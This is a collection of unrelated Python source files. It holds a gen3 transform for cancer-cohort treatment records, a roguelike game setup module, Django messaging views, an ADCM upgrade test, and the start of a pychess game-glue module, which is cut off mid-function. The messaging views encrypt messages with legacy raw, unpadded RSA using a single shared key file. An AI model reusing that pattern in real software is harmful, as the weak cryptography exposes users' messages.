    bcc_treatment_emitter = emitter('bcc_chemotherapy', output_dir=output_dir)
    # ``_type`` avoids shadowing the builtin; it is unused in this transform.
    for p, _type, callback in item_paths:
        source = os.path.splitext(os.path.basename(p))[0]
        for line in reader(p):
            line['source'] = source
            if callback:
                line = callback(line)
            # Consistent with transform_surgery/transform_radiotherapy:
            # accept either key casing for the participant id.
            participantid = line.get('ParticipantID', line.get('participantid', None))
            assert participantid, 'ParticipantID not in {} {}'.format(p, line.keys())
            diagnosis_submitter_id = '{}-diagnosis'.format(participantid)
            treatment_submitter_id = '{}-Chemotherapy-{}'.format(diagnosis_submitter_id, get_uniq(line))
            if treatment_submitter_id not in treatment_ids:
                continue
            bcc_treatment = {
                'type': 'bcc_chemotherapy',
                'project_id': project_id,
                'treatment': {'submitter_id': treatment_submitter_id},
                'submitter_id': '{}-{}-{}'.format(treatment_submitter_id, line['days'], line.get('treatment_description', line.get('treatment_agent', 'na')))
            }
            bcc_treatment.update(line)
            bcc_treatment = obscure_dates(bcc_treatment, output_dir=output_dir)
            bcc_treatment_emitter.write(bcc_treatment)
    bcc_treatment_emitter.close()
def transform_surgery(item_paths, output_dir, project_id, treatment_ids, compresslevel=0):
    """Read bcc labkey json and writes gen3 json.

    Emits one de-duplicated bcc_surgery record per input row whose parent
    treatment id exists in *treatment_ids*.
    """
    surgery_emitter = emitter('bcc_surgery', output_dir=output_dir)
    emitted_ids = []
    for path, _surgery_type, callback in item_paths:
        source = os.path.splitext(os.path.basename(path))[0]
        for record in reader(path):
            record['source'] = source
            if callback:
                record = callback(record)
            participant = record.get('ParticipantID', record.get('participantid', None))
            assert participant, 'ParticipantID not in {} {}'.format(path, record.keys())
            diagnosis_id = '{}-diagnosis'.format(participant)
            treatment_id = '{}-Surgery-{}'.format(diagnosis_id, get_uniq(record))
            surgery_id = '{}-bcc_surgery'.format(treatment_id)
            # Skip rows without a known parent treatment or already emitted.
            if treatment_id not in treatment_ids or surgery_id in emitted_ids:
                continue
            emitted_ids.append(surgery_id)
            surgery = {
                'type': 'bcc_surgery',
                'project_id': project_id,
                'treatment': {'submitter_id': treatment_id},
                'submitter_id': surgery_id
            }
            # 'type' in the resection-date export would clobber the gen3
            # node type set above.
            if 'type' in record and path == 'source/bcc/vResectionDate.json':
                del record['type']
            surgery.update(record)
            surgery = obscure_dates(surgery, output_dir=output_dir)
            surgery_emitter.write(surgery)
    surgery_emitter.close()
def transform_radiotherapy(item_paths, output_dir, project_id, treatment_ids, compresslevel=0):
    """Read bcc labkey json and writes gen3 json.

    Emits one de-duplicated bcc_radiotherapy record per input row whose
    parent treatment id exists in *treatment_ids*.
    """
    bcc_treatment_emitter = emitter('bcc_radiotherapy', output_dir=output_dir)
    bcc_treatment_submitter_ids = []
    # ``_type`` avoids shadowing the builtin; it is unused in this transform.
    for p, _type, callback in item_paths:
        source = os.path.splitext(os.path.basename(p))[0]
        for line in reader(p):
            line['source'] = source
            if callback:
                line = callback(line)
            participantid = line.get('ParticipantID', line.get('participantid', None))
            assert participantid, 'ParticipantID not in {} {}'.format(p, line.keys())
            diagnosis_submitter_id = '{}-diagnosis'.format(participantid)
            treatment_submitter_id = '{}-Radiotherapy-{}'.format(diagnosis_submitter_id, get_uniq(line))
            bcc_treatment_submitter_id = '{}-bcc_radiotherapy'.format(treatment_submitter_id)
            if treatment_submitter_id not in treatment_ids:
                print('transform_radiotherapy {} not in treatment_ids, skipping.'.format(treatment_submitter_id))
                continue
            if bcc_treatment_submitter_id in bcc_treatment_submitter_ids:
                print('transform_radiotherapy {} in bcc_treatment_submitter_ids, skipping.'.format(treatment_submitter_id))
                continue
            bcc_treatment_submitter_ids.append(bcc_treatment_submitter_id)
            bcc_treatment = {
                'type': 'bcc_radiotherapy',
                'project_id': project_id,
                'treatment': {'submitter_id': treatment_submitter_id},
                'submitter_id': bcc_treatment_submitter_id
            }
            # 'type' would collide with the gen3 node type above; rename it.
            # Guarded so records lacking a 'type' field no longer KeyError.
            if 'type' in line:
                line['radiotherapy_type'] = line.pop('type')
            bcc_treatment.update(line)
            bcc_treatment = obscure_dates(bcc_treatment, output_dir=output_dir)
            bcc_treatment_emitter.write(bcc_treatment)
    bcc_treatment_emitter.close()
def lookups():
    """Build {category: {id_value: display_name}} from LOOKUP_PATHS.

    The category name is the file's basename without the directory prefix
    or the .json suffix; the id comes from the first non-private '*_id'
    field of each row.
    """
    look_ups = {}
    for path in LOOKUP_PATHS:
        category = path.replace('source/bcc/', '').replace('.json', '')
        look_ups[category] = {}
        print(path, category)
        for row in reader(path):
            display = row.get('display_name', row.get('alt_display_name', None))
            id_value = [row[k] for k in row
                        if not k.startswith('_') and k.endswith('_id')][0]
            look_ups[category][id_value] = display
    return look_ups
# Built once at import time; my_callback() resolves '*_id' fields through it.
LOOKUPS = lookups()
def my_callback(line):
    """Remove fields that start with _, fix key names with embedded /, fix id lookups.

    Mutates and returns *line*:
      * drops keys beginning with '_';
      * renames 'table/field' keys to plain 'field';
      * replaces each '*_id' foreign key with its display name looked up in
        the module-level LOOKUPS table (the lookup table is dumped to stdout
        before re-raising if the id is missing);
      * strips the 'chr' prefix from 'chromosome' and renames 'gene' to
        'gene_symbol';
      * finally passes the record through obscure_dates().
    """
    for k in [k for k in line if k.startswith('_')]:
        del line[k]
    for k in [k for k in line if '/' in k]:
        line[k.split('/')[1]] = line[k]
        del line[k]
    for k in [k for k in line if k.endswith('_id')]:
        lup = k.replace('_id', '')
        # Falsy ids (None / empty) are dropped without attempting a lookup.
        if line[k]:
            try:
                line[lup] = LOOKUPS[lup][line[k]]
            except Exception as e:
                # Dump the offending lookup table to make data problems
                # easy to diagnose, then re-raise.
                print(lup, k, line[k])
                print('******')
                print(LOOKUPS[lup])
                print('******')
                raise e
        del line[k]
    if 'chromosome' in line:
        line['chromosome'] = str(line['chromosome'].replace('chr',''))
    if 'gene' in line:
        line['gene_symbol'] = line['gene']
        del line['gene']
    line = obscure_dates(line)
    return line
def my_schema_callback(schema):
    """Remove fields that start with _, fix key names with embedded /, fix id lookups.

    Mirrors my_callback() at the schema level: drops private properties,
    renames 'a/b' property keys to 'b', and replaces non-required,
    non-system '*_id' lookup properties with a nullable string property
    named without the suffix. Also stamps the bcc category and the to-one
    'treatment' link reference.

    BUG FIX: the original ended with two consecutive ``return schema``
    statements; the second was unreachable and has been removed.
    """
    for k in [k for k in schema['properties'] if k.startswith('_')]:
        del schema['properties'][k]
    for k in [k for k in schema['properties'] if '/' in k]:
        schema['properties'][k.split('/')[1]] = schema['properties'][k]
        del schema['properties'][k]
    for k in [k for k in schema['properties'] if k.endswith('_id')]:
        # Required/system id properties must keep their original shape.
        if k in schema['required'] or k in schema['systemProperties']:
            continue
        schema['properties'][k.replace('_id', '')] = {'type': ['string', 'null']}
        del schema['properties'][k]
    # adds extra properties not found in the source rows
    schema['category'] = 'bcc extention'
    schema['properties']['treatment'] = {'$ref': '_definitions.yaml#/to_one'}
    return schema
if __name__ == "__main__":
    # Orchestration: emit the gen3 treatment nodes first (collecting their
    # submitter ids), then each bcc_* extension node plus its generated
    # schema. (A dead ``item_paths`` assignment that was immediately
    # overwritten has been removed.)
    args = default_parser(DEFAULT_OUTPUT_DIR, DEFAULT_EXPERIMENT_CODE, DEFAULT_PROJECT_ID).parse_args()
    item_paths = [
        ('source/bcc/treatment_chemotherapy_ohsu.json', 'Chemotherapy', my_callback),
        ('source/bcc/treatment_chemotherapy_manually_entered.json', 'Chemotherapy', my_callback),
        # ('source/bcc/vResectionDate.json', 'Surgery', None),
        ('source/bcc/voncologsurgery.json', 'Surgery', None),
        ('source/bcc/Radiotherapy.json', 'Radiotherapy', None)
    ]
    treatment_ids = transform_gen3(item_paths, output_dir=args.output_dir, project_id=args.project_id)
    # Chemotherapy extension nodes + schema.
    item_paths = [
        ('source/bcc/treatment_chemotherapy_ohsu.json', 'Chemotherapy', my_callback),
        ('source/bcc/treatment_chemotherapy_manually_entered.json', 'Chemotherapy', my_callback),
    ]
    transform_chemotherapy(item_paths, treatment_ids=treatment_ids, output_dir=args.output_dir, project_id=args.project_id)
    item_paths = [
        'output/bcc/bcc_chemotherapy.json',
    ]
    link = {'name':'treatment', 'backref':'bcc_chemotherapy', 'label':'describes', 'target_type':'treatment', 'multiplicity': 'many_to_one', 'required': False }
    schema_path = generate(item_paths,'bcc_chemotherapy', output_dir='output/bcc', links=[link], callback=my_schema_callback)
    assert os.path.isfile(schema_path), 'should have an schema file {}'.format(schema_path)
    print(schema_path)
    # Surgery extension nodes + schema.
    item_paths = [
        ('source/bcc/vResectionDate.json', 'Surgery', my_callback),
        ('source/bcc/voncologsurgery.json', 'Surgery', my_callback),
    ]
    transform_surgery(item_paths, treatment_ids=treatment_ids, output_dir=args.output_dir, project_id=args.project_id)
    item_paths = [
        'output/bcc/bcc_surgery.json',
    ]
    link = {'name':'treatment', 'backref':'bcc_surgery', 'label':'describes', 'target_type':'treatment', 'multiplicity': 'many_to_one', 'required': False }
    schema_path = generate(item_paths,'bcc_surgery', output_dir='output/bcc', links=[link], callback=my_schema_callback)
    assert os.path.isfile(schema_path), 'should have an schema file {}'.format(schema_path)
    print(schema_path)
    # Radiotherapy extension nodes + schema.
    item_paths = [
        ('source/bcc/Radiotherapy.json', 'Radiotherapy', my_callback),
    ]
    transform_radiotherapy(item_paths, treatment_ids=treatment_ids, output_dir=args.output_dir, project_id=args.project_id)
    item_paths = [
        'output/bcc/bcc_radiotherapy.json',
    ]
    link = {'name':'treatment', 'backref':'bcc_radiotherapy', 'label':'describes', 'target_type':'treatment', 'multiplicity': 'many_to_one', 'required': False }
    schema_path = generate(item_paths,'bcc_radiotherapy', output_dir='output/bcc', links=[link], callback=my_schema_callback)
    assert os.path.isfile(schema_path), 'should have an schema file {}'.format(schema_path)
    print(schema_path)
|
<filename>functions/initialize.py
import tcod
from typing import Dict, Tuple
from components.entity import Entity
from components.equipment import Equipment
from components.equippable import Equippable
from components.fighter import Fighter
from components.inventory import Inventory
from components.level import Level
from components.message_log import MessageLog
from constants.equipment_slots import EquipmentSlots
from constants.game_states import GameStates
from functions.render import RenderOrder
from map_objects.game_map import GameMap
def get_constants() -> Dict:
    """Return the static game configuration: window/UI geometry,
    map-generation parameters, FOV settings and the color palette."""
    # Values reused in derived entries below.
    screen_width: int = 80
    screen_height: int = 50
    bar_width: int = 20
    panel_height: int = 7
    constants: Dict = {
        'window_title': 'Roguelike Tutorial tcod',
        'screen_width': screen_width,
        'screen_height': screen_height,
        'bar_width': bar_width,
        'panel_height': panel_height,
        'panel_y': screen_height - panel_height,
        'message_x': bar_width + 2,
        'message_width': screen_width - bar_width - 2,
        'message_height': panel_height - 1,
        'map_width': 80,
        'map_height': 43,
        'room_max_size': 10,
        'room_min_size': 6,
        'max_rooms': 30,
        'fov_algorithm': 0,
        'fov_light_walls': True,
        'fov_radius': 10,
        'max_monsters_per_room': 3,
        'max_items_per_room': 2,
        'colors': {
            'dark_wall': tcod.Color(169, 169, 169),  # CSS DarkGray
            'dark_ground': tcod.Color(0, 0, 0),      # CSS Black
            'light_wall': tcod.Color(130, 110, 50),
            'light_ground': tcod.Color(200, 180, 50),
            'player': tcod.white,
            'magic_item': tcod.violet,
            'orc': tcod.desaturated_green,
            'troll': tcod.darker_green,
        },
    }
    return constants
def get_game_variables(constants: Dict) -> Tuple:
    """Create the initial state for a fresh game run.

    Returns (player, entities, game_map, message_log, game_state): the
    player entity (with fighter/inventory/level/equipment components and a
    starting equipped dagger), the entity list, a freshly generated map, an
    empty message log, and the PLAYERS_TURN state.
    """
    # initialize player/fighter and inventory
    fighter_component = Fighter(hp=100, defense=1, power=2)
    inventory_component = Inventory(26)
    level_component = Level()
    equipment_component = Equipment()
    # Player spawns at the screen centre; the map generator repositions it
    # into the first room via make_map() below.
    player = Entity(int(constants['screen_width'] / 2),
                    int(constants['screen_height'] /
                        2), "@", constants['colors'].get('player'),
                    'Player', blocks=True, render_order=RenderOrder.ACTOR,
                    fighter=fighter_component, inventory=inventory_component,
                    level=level_component, equipment=equipment_component)
    entities = [player]
    # set up inventory stuff: starting dagger, added and auto-equipped
    equippable_component = Equippable(EquipmentSlots.MAIN_HAND, power_bonus=2)
    dagger = Entity(0, 0, '-', tcod.sky, 'Dagger',
                    equippable=equippable_component)
    player.inventory.add_item(dagger)
    player.equipment.toggle_equip(dagger)
    # initialize game map
    game_map = GameMap(constants['map_width'], constants['map_height'])
    game_map.make_map(constants['max_rooms'], constants['room_min_size'], constants['room_max_size'],
                      constants['map_width'], constants['map_height'], player,
                      entities, constants['colors'])
    # initialize blank message log
    message_log = MessageLog(
        constants['message_x'], constants['message_width'], constants['message_height'])
    # set initial game state
    game_state = GameStates.PLAYERS_TURN
    return player, entities, game_map, message_log, game_state
|
import os
from django.shortcuts import render
# from django.contrib.auth.models import User
# from django.contrib.auth import login, authenticate
# from .forms import SignupForm
# from django.db import models
from fintech import settings
from messenger.forms import *
from django.contrib.auth.decorators import login_required
# from django.contrib.auth.decorators import user_passes_test
from messenger.models import Message
from django.http import HttpResponseRedirect
from django.utils import encoding
from Crypto.PublicKey import RSA
from newsletter.models import *
from django.core.mail import send_mail
# Create your views here.
@login_required
def delete(request, message_id):
    """Delete a message from the requester's inbox.

    Only the recipient may delete; anyone else is redirected to the inbox
    unchanged. Fetches the row once (the original queried it twice).
    """
    message = Message.objects.get(pk=int(message_id))
    if request.user.get_username() != message.message_to:
        return HttpResponseRedirect('/inbox/')
    message.delete()
    return HttpResponseRedirect('/inbox/')
@login_required
def unencrypt(request, message_id):
    """Decrypt an encrypted inbox message in place and redirect to the inbox.

    Only the recipient may decrypt; anyone else is redirected untouched.
    On success the plaintext replaces message_content and is_encrypted is
    cleared.
    """
    # Fetch once and reuse (the original issued the same query twice).
    message = Message.objects.get(pk=int(message_id))
    if request.user.get_username() != message.message_to:
        return HttpResponseRedirect('/inbox/')
    if message.is_encrypted == 'Y':
        PROJECT_PATH = os.path.abspath(os.path.dirname(__name__))
        file_path = os.path.join(PROJECT_PATH, 'key')
        # Close the key file deterministically (previously leaked).
        with open(file_path, 'rb') as f:
            bin_key = f.read()
        obj_key = RSA.importKey(bin_key, passphrase=None)
        # NOTE(review): RsaKey.decrypt() is the legacy raw-RSA PyCrypto
        # API; confirm the installed Crypto package still provides it.
        message.message_content = obj_key.decrypt(bytes(message.message_enc_content)).decode()
        message.is_encrypted = 'N'
        message.save()
    return HttpResponseRedirect('/inbox/')
@login_required
def viewMessages(request):
    """Render the inbox, advancing each message's read-state flag.

    State transitions applied on every view: 'I' (incoming, not yet
    listed) -> 'U' (unread), anything else -> 'R' (read). Debug prints
    from the original have been removed.
    """
    view = Message.objects.filter(message_to=request.user.get_username())
    for message in view:
        if message.isNew == 'I':
            message.isNew = 'U'
        else:
            message.isNew = 'R'
        message.save()
    return render(request, 'viewMessages.html', {'messages': view})
@login_required
def newMessage(request):
    """Compose a message.

    On POST, validates the form and stores the message; if the sender asked
    for encryption, the body is RSA-encrypted with the site key file and the
    stored plaintext is replaced with '[encrypted]'.
    """
    if request.method == 'POST':
        form = MessageForm(request.POST)
        if form.is_valid():
            message = Message.objects.create()
            message.is_encrypted = request.POST.get('is_encrypted')
            message.message_to = request.POST.get('message_to')
            message.message_from = request.user.get_username()
            message.message_title = request.POST.get('message_title')
            message.message_content = request.POST.get('message_content')
            message.isNew = 'I'
            if message.is_encrypted == 'Y':
                PROJECT_PATH = os.path.abspath(os.path.dirname(__name__))
                file_path = os.path.join(PROJECT_PATH, 'key')
                # Close the key file deterministically (previously leaked).
                with open(file_path, 'rb') as f:
                    bin_key = f.read()
                # BUG FIX: the source contained an unexpanded "<PASSWORD>"
                # placeholder (a SyntaxError). Load the key without a
                # passphrase, matching unencrypt() above — confirm the key
                # file really is unprotected.
                obj_key = RSA.importKey(bin_key, passphrase=None)
                message.message_enc_content = obj_key.encrypt(str.encode(message.message_content), 0)[0]
                message.message_content = '[encrypted]'
            message.save()
            return HttpResponseRedirect('/inbox/')
        else:
            print(form.errors)
    else:
        form = MessageForm()
    return render(request, 'newMessage.html', {'form': form})
@login_required
def groupEmail(request):
    """Send an email to every member of a chosen group.

    Superusers may target any group; other users only the groups they
    belong to. Redirects to the confirmation page on success.
    """
    # Hoisted the superuser test out of the loop (it does not depend on g).
    if request.user.is_superuser:
        groups = list(Group.objects.all())
    else:
        groups = [g for g in Group.objects.all() if request.user in g.user_set.all()]
    if request.method == 'POST':
        form = EmailForm(request.POST)
        if form.is_valid():
            group = Group.objects.get(id=request.POST.get('group'))
            message_subject = request.POST.get('message_subject')
            message_content = request.POST.get('message_content')
            for user in group.user_set.all():
                send_mail(
                    'Lokahi: '+message_subject,
                    'User "' + request.user.username +'" from Lokahi sent group "' + group.name +
                    '" this message: \n\n' + message_content,
                    # BUG FIX: the source contained an unexpanded "<EMAIL>"
                    # placeholder; use the project-wide default sender.
                    # NOTE(review): confirm DEFAULT_FROM_EMAIL is set in
                    # fintech.settings.
                    settings.DEFAULT_FROM_EMAIL,
                    [user.email],
                    fail_silently=False,
                )
            return HttpResponseRedirect('/inbox/emailSuccess/')
        else:
            print(form.errors)
    else:
        form = EmailForm()
    return render(request, 'groupEmail.html', {'form': form, 'groups': groups})
@login_required
def emailSuccess(request):
    """Render the confirmation page shown after a group email is sent."""
    template_name = 'emailSuccess.html'
    return render(request, template_name)
|
<filename>tests/functional/test_adcm_upgrade.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint:disable=redefined-outer-name
from typing import Tuple, Union
import allure
import pytest
from adcm_client.base import ObjectNotFound
from adcm_client.objects import ADCMClient, Cluster, Host, Service
from adcm_pytest_plugin.docker_utils import ADCM
from adcm_pytest_plugin.plugin import parametrized_by_adcm_version
from adcm_pytest_plugin.utils import catch_failed, get_data_dir, random_string
from version_utils import rpm
@pytest.fixture(scope="session")
def upgrade_target(cmd_opts) -> Tuple[str, str]:
    """Session fixture: (repository, tag) parsed from the --adcm-image CLI
    option; fails the session if the option is missing.

    NOTE(review): ``split(":", maxsplit=2)`` yields three elements for
    images with a registry port (e.g. "host:5000/adcm:tag"), which would
    not match the declared pair; ``rsplit(":", 1)`` looks intended —
    confirm the expected image format before changing.
    """
    if not cmd_opts.adcm_image:
        pytest.fail("CLI parameter adcm_image should be provided")
    return tuple(cmd_opts.adcm_image.split(":", maxsplit=2))  # type: ignore
def old_adcm_images():
    """Old ADCM image parameters (min version 2019.10.08) used to seed the
    upgrade-test parametrization."""
    return parametrized_by_adcm_version(adcm_min_version="2019.10.08")[0]
@allure.step("Check that version has been changed")
def _check_that_version_changed(before: str, after: str) -> None:
    """Fail unless *after* is a strictly newer rpm-style version than *before*."""
    upgraded = rpm.compare_versions(after, before) >= 1
    if not upgraded:
        raise AssertionError("ADCM version after upgrade is older or equal to the version before")
def _upgrade_adcm(adcm: ADCM, sdk: ADCMClient, credentials: dict, target: Tuple[str, str]) -> None:
    """Upgrade the ADCM container to *target*, re-login with *credentials*,
    and assert that the reported version actually advanced."""
    version_before = sdk.adcm_version
    adcm.upgrade(target)
    sdk.reset(url=adcm.url, **credentials)
    _check_that_version_changed(version_before, sdk.adcm_version)
def _create_cluster(sdk_client_fs: ADCMClient, bundle_dir: str = "cluster_bundle") -> Cluster:
    """Upload the bundle from *bundle_dir* and create a cluster with a
    randomized name from its prototype."""
    uploaded = sdk_client_fs.upload_from_fs(get_data_dir(__file__, bundle_dir))
    return uploaded.cluster_prototype().cluster_create(name=f"test_{random_string()}")
def _create_host(sdk_client_fs: ADCMClient, bundle_dir: str = "hostprovider") -> Host:
    """Upload the provider bundle from *bundle_dir*, create a provider and a
    host on it, both with randomized names."""
    uploaded = sdk_client_fs.upload_from_fs(get_data_dir(__file__, bundle_dir))
    new_provider = uploaded.provider_create(name=f"test_{random_string()}")
    return new_provider.host_create(fqdn=f"test_host_{random_string()}")
@allure.step("Check that previously created cluster exists")
def _check_that_cluster_exists(sdk_client_fs: ADCMClient, cluster: Cluster) -> None:
    """Assert exactly one cluster survived and it is retrievable by name."""
    cluster_count = len(sdk_client_fs.cluster_list())
    assert cluster_count == 1, "Only one cluster expected to be"
    with catch_failed(ObjectNotFound, "Previously created cluster not found"):
        sdk_client_fs.cluster(name=cluster.name)
@allure.step("Check that previously created host exists")
def _check_that_host_exists(cluster: Cluster, host: Host) -> None:
    """Assert the cluster still has exactly one host and it is retrievable
    by FQDN.

    Fix: the allure step text previously read "service exists" although the
    check is about hosts, producing a misleading line in the report.
    """
    assert len(cluster.host_list()) == 1, "Only one host expected to be"
    with catch_failed(ObjectNotFound, "Previously created host not found"):
        cluster.host(fqdn=host.fqdn)
@allure.step("Check encryption")
def _check_encryption(obj: Union[Cluster, Service]) -> None:
    """Run the object's ``check-password`` action and assert it succeeds."""
    task_result = obj.action(name="check-password").run().wait()
    assert task_result == "success"
@pytest.mark.parametrize("adcm_is_upgradable", [True], indirect=True)
@pytest.mark.parametrize("image", old_adcm_images(), ids=repr)
def test_upgrade_adcm(
    adcm_fs: ADCM,
    sdk_client_fs: ADCMClient,
    adcm_api_credentials: dict,
    upgrade_target: Tuple[str, str],
) -> None:
    """Test adcm upgrade"""
    # Create a cluster with one host attached, upgrade ADCM in place,
    # then verify both objects survived the upgrade.
    cluster = _create_cluster(sdk_client_fs)
    host = _create_host(sdk_client_fs)
    cluster.host_add(host)
    _upgrade_adcm(adcm_fs, sdk_client_fs, adcm_api_credentials, upgrade_target)
    _check_that_cluster_exists(sdk_client_fs, cluster)
    _check_that_host_exists(cluster, host)
@pytest.mark.parametrize("adcm_is_upgradable", [True], indirect=True)
@pytest.mark.parametrize("image", old_adcm_images(), ids=repr)
def test_pass_in_config_encryption_after_upgrade(
    adcm_fs: ADCM,
    sdk_client_fs: ADCMClient,
    adcm_api_credentials: dict,
    upgrade_target: Tuple[str, str],
) -> None:
    """Test adcm upgrade with encrypted fields"""
    # Set the same password on both cluster and service config, upgrade,
    # then verify the encrypted values still validate via check-password.
    cluster = _create_cluster(sdk_client_fs, "cluster_with_pass_verify")
    service = cluster.service_add(name="PassCheckerService")
    config_diff = dict(password="<PASSWORD>")
    cluster.config_set_diff(config_diff)
    service.config_set_diff(config_diff)
    _upgrade_adcm(adcm_fs, sdk_client_fs, adcm_api_credentials, upgrade_target)
    _check_encryption(cluster)
    _check_encryption(service)
|
<filename>pychess/widgets/gamenanny.py
""" This module intends to work as glue between the gamemodel and the gamewidget
taking care of stuff that is neither very offscreen nor very onscreen
like bringing up dialogs and """
import math
from collections import defaultdict
from gi.repository import Gtk
from pychess.compat import create_task
from pychess.ic.FICSObjects import (
make_sensitive_if_available,
make_sensitive_if_playing,
)
from pychess.ic.ICGameModel import ICGameModel
from pychess.Utils.Offer import Offer
from pychess.Utils.const import (
WAITING_TO_START,
WHITE,
BLACK,
WHITEWON,
BLACKWON,
WON_ADJUDICATION,
TAKEBACK_OFFER,
LOCAL,
UNDOABLE_STATES,
WHITE_ENGINE_DIED,
UNDOABLE_REASONS,
BLACK_ENGINE_DIED,
HINT,
SPY,
RUNNING,
ABORT_OFFER,
ADJOURN_OFFER,
DRAW_OFFER,
PAUSE_OFFER,
RESUME_OFFER,
HURRY_ACTION,
FLAG_CALL,
)
from pychess.Utils.repr import reprResult_long, reprReason_long
from pychess.Utils.LearnModel import LearnModel
from pychess.System import conf
from pychess.System.Log import log
from pychess.widgets import preferencesDialog
from pychess.widgets.InfoBar import InfoBarMessage, InfoBarMessageButton
from pychess.widgets import InfoBar, mainwindow
from pychess.widgets.gamewidget import getWidgets
from pychess.perspectives import perspective_manager
class GameNanny:
    """Glue between gamemodel and gamewidget.

    Connects signal handlers when a game widget is created, shows infobar
    messages/dialogs around game start and end, and manages the analyzer
    lifecycle. One module-level instance (``game_nanny``) serves all games.
    """

    def __init__(self):
        # Per-gamemodel {player: cid} for "offer" handlers.
        self.offer_cids = defaultdict(dict)
        # Per-widget / per-model lists of connected signal ids, so they can
        # be disconnected on termination.
        self.gmwidg_cids = defaultdict(list)
        self.model_cids = defaultdict(list)

    def nurseGame(self, gmwidg, gamemodel):
        """ Call this function when gmwidget is just created """
        log.debug("nurseGame: %s %s" % (gmwidg, gamemodel))

        self.gmwidg_cids[gmwidg] = [
            gmwidg.connect("closed", self.on_gmwidg_closed),
            gmwidg.connect("title_changed", self.on_gmwidg_title_changed),
        ]

        if gamemodel.status == WAITING_TO_START:
            self.model_cids[gamemodel].append(
                gamemodel.connect("game_started", self.on_game_started, gmwidg)
            )
        else:
            self.on_game_started(gamemodel, gmwidg)

        self.model_cids[gamemodel].append(
            gamemodel.connect("game_ended", self.game_ended, gmwidg)
        )
        self.model_cids[gamemodel].append(
            gamemodel.connect("game_terminated", self.on_game_terminated, gmwidg)
        )

        if isinstance(gamemodel, ICGameModel):
            gmwidg.cids[gamemodel.connection] = gamemodel.connection.connect(
                "disconnected", self.on_disconnected, gmwidg
            )

    def on_game_terminated(self, gamemodel, gmwidg):
        """Disconnect every handler registered in nurseGame and drop the
        bookkeeping entries."""
        for player in self.offer_cids[gamemodel]:
            player.disconnect(self.offer_cids[gamemodel][player])
        for cid in self.model_cids[gamemodel]:
            gamemodel.disconnect(cid)
        for cid in self.gmwidg_cids[gmwidg]:
            gmwidg.disconnect(cid)
        del self.offer_cids[gamemodel]
        del self.gmwidg_cids[gmwidg]
        del self.model_cids[gamemodel]

    def on_disconnected(self, fics_connection, gamewidget):
        """Grey out the game-ended infobar buttons once the FICS connection
        is gone (rematch/observe can no longer be sent)."""
        def disable_buttons():
            for button in gamewidget.game_ended_message.buttons:
                button.set_property("sensitive", False)
                button.set_property("tooltip-text", "")

        if gamewidget.game_ended_message:
            # BUG FIX: the bare name ``disable_buttons`` was a no-op
            # expression; the nested function was never actually invoked.
            disable_buttons()

    # ===============================================================================
    # Gamewidget signals
    # ===============================================================================

    def on_gmwidg_closed(self, gmwidg):
        """Reset the main window title when the last game widget closes."""
        perspective = perspective_manager.get_perspective("games")
        if len(perspective.key2gmwidg) == 1:
            getWidgets()["main_window"].set_title("%s - PyChess" % _("Welcome"))
        return False

    def on_gmwidg_title_changed(self, gmwidg, new_title):
        """Mirror the front-most widget's title into the main window title."""
        # log.debug("gamenanny.on_gmwidg_title_changed: starting %s" % repr(gmwidg))
        if gmwidg.isInFront():
            getWidgets()["main_window"].set_title("%s - PyChess" % new_title)
        # log.debug("gamenanny.on_gmwidg_title_changed: returning")
        return False

    # ===============================================================================
    # Gamemodel signals
    # ===============================================================================

    def game_ended(self, gamemodel, reason, gmwidg):
        """Build and show the end-of-game infobar message (result text plus
        rematch/observe/undo buttons depending on game type), report dead
        engines, and restart analyzers where appropriate."""
        log.debug(
            "gamenanny.game_ended: reason=%s gmwidg=%s\ngamemodel=%s"
            % (reason, gmwidg, gamemodel)
        )
        nameDic = {
            "white": gamemodel.players[WHITE],
            "black": gamemodel.players[BLACK],
            "mover": gamemodel.curplayer,
        }
        if gamemodel.status == WHITEWON:
            nameDic["winner"] = gamemodel.players[WHITE]
            nameDic["loser"] = gamemodel.players[BLACK]
        elif gamemodel.status == BLACKWON:
            nameDic["winner"] = gamemodel.players[BLACK]
            nameDic["loser"] = gamemodel.players[WHITE]
        msg_one = reprResult_long[gamemodel.status] % nameDic
        msg_two = reprReason_long[reason] % nameDic
        if gamemodel.reason == WON_ADJUDICATION:
            # The adjudicated loser is the side opposite the winner.
            color = BLACK if gamemodel.status == WHITEWON else WHITE
            invalid_move = gamemodel.players[color].invalid_move
            if invalid_move:
                msg_two += _(" invalid engine move: %s" % invalid_move)

        content = InfoBar.get_message_content(msg_one, msg_two, Gtk.STOCK_DIALOG_INFO)
        message = InfoBarMessage(Gtk.MessageType.INFO, content, None)

        callback = None
        if isinstance(gamemodel, ICGameModel):
            if gamemodel.hasLocalPlayer() and not gamemodel.examined:

                def status_changed(player, prop, message):
                    make_sensitive_if_available(message.buttons[0], player)
                    make_sensitive_if_playing(message.buttons[1], player)

                def callback(infobar, response, message, gamemodel=gamemodel):
                    if response == 0:
                        gamemodel.remote_player.offerRematch()
                    elif response == 1:
                        gamemodel.remote_player.observe()
                    return False

                gmwidg.cids[
                    gamemodel.remote_ficsplayer
                ] = gamemodel.remote_ficsplayer.connect(
                    "notify::status", status_changed, message
                )
                message.add_button(InfoBarMessageButton(_("Offer Rematch"), 0))
                message.add_button(
                    InfoBarMessageButton(
                        _("Observe %s" % gamemodel.remote_ficsplayer.name), 1
                    )
                )
                status_changed(gamemodel.remote_ficsplayer, None, message)
            else:

                def status_changed(player, prop, button):
                    make_sensitive_if_playing(button, player)

                def callback(infobar, response, message, gamemodel=gamemodel):
                    if response in (0, 1):
                        gamemodel.players[response].observe()
                    return False

                for i, player in enumerate(gamemodel.ficsplayers):
                    button = InfoBarMessageButton(_("Observe %s" % player.name), i)
                    message.add_button(button)
                    gmwidg.cids[player] = player.connect(
                        "notify::status", status_changed, button
                    )
                    status_changed(player, None, button)
        elif gamemodel.hasLocalPlayer() and not isinstance(gamemodel, LearnModel):

            def callback(infobar, response, message, gamemodel=gamemodel):
                if response == 1:
                    # newGameDialog uses perspectives.games uses gamenanny uses newGameDialog...
                    from pychess.widgets.newGameDialog import createRematch

                    createRematch(gamemodel)
                elif response == 2:
                    if gamemodel.ply > 1:
                        offer = Offer(TAKEBACK_OFFER, 2)
                    else:
                        offer = Offer(TAKEBACK_OFFER, 1)
                    if gamemodel.players[0].__type__ == LOCAL:
